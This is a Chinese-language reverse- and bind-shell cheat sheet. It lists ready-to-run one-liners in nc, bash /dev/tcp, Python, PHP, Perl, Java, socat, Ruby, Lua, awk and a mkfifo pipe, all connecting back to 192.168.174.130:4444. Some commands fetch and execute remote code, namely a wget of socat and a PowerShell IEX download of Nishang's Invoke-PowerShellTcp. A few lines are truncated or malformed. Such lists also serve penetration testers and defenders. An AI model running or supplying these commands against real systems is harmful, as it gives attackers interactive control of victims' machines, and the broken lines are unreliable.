正向shell

shell分为两种,一种是正向shell,另一种是反向shell。如果客户端连接服务器,客户端主动连接服务器,就称为正向shell。如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell。反向shell通常在开启了防护措施的目标机器上,例如防火墙、端口转发等。

输入如下命令,监听目标主机的4444端口

  1. nc -lvp 4444 -e /bin/bash // linux
  2. nc -lvp 4444 -e c:\windows\system32\cmd.exe // windows

在本地或vps主机上连接目标的4444端口,即可获得目标主机的shell

  1. nc 192.168.174.130 4444

clipboard.png

反向shell

输入如下命令,在本地或者vps主机上监听9999端口

  1. nc -lvp 9999

在目标主机中输入如下命令,连接vps主机的9999端口

  1. nc 192.168.174.130 9999 -e /bin/sh // linux
  2. nc 192.168.174.130 9999 -e c:\windows\system32\cmd.exe // windows

clipboard (1).png
正向shell:本地或vps将自己的shell传给服务器(端口监听在服务器上)。
反弹shell:目标机器将shell主动传给本地或vps(端口监听在本地vps上)。
在目标主机中没有nc时获得反向shell


Python反向shell


Python 2.7:

  1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.174.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

clipboard (2).png
Bash反向shell


个人感觉最好用的用的方法就是使用的方法就是使用bash结合重定向方法的一句话

  1. vpsnc -lvp 4444
  2. bash -i >& /dev/tcp/192.168.174.130/4444 0>&1

clipboard (3).png
PHP反向shell

  1. php -r '$sock=fsockopen("192.168.174.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

clipboard (4).png
Perl反向shell

  1. perl -e 'use Socket;$i="192.168.174.130";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

clipboard (5).png
第二种方式(linux):

  1. perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.174.130:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

第三种方式(windwos):

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.174.130:4444");STDIN->f

Java脚本反弹shell


第一种:

  1. Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.174.130/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"}); p.waitFor();

第二种:

  1. Runtime r = Runtime.getRuntime(); Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.174.130/4444 0>&1"}); p.waitFor();

socat 反弹shell

  1. wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat chmod 755 /tmp/socat /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.174.130:4444

clipboard (6).png
Ruby反弹shell

  1. ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.174.130","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

clipboard (7).png
第二种方式(linux):

  1. ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.10.166","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

第三种方式(windows):

  1. ruby -rsocket -e 'c=TCPSocket.new("10.10.10.166","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua反弹shell

  1. lua -e "require('socket');require('os');t=socket.tcp();t:connect('192。168.174.130','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Awk反弹shell

  1. awk 'BEGIN{s="/inet/tcp/0/192.168.174.130/4444";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

clipboard (8).png
exec反弹shell

  1. exec 5<>/dev/tcp/192.168.174.130/4444 cat <&5 | while read line; do $line 2>&5 >&5; done


第二种方式:

  1. 0<&196;exec 196<>/dev/tcp/192.168.174.130/4444; sh <&196>&196 2>&196

clipboard (10).png
nc反弹shell

  1. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.174.130 4444 >/tmp/f

clipboard (11).png
powershell反弹shell

  1. apt-get install powshell powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.174.130 -port 4444

clipboard (12).png
从原生的 shell 环境切换到linux的交互式 bash 环境 通常我们nc获得的shell都是不完全shell,需要通过Python的pty转换为拥有完全命令行的完全shell,方便我们进行复制粘贴等操作。

  1. python -c "import pty;pty.spawn('/bin/bash')"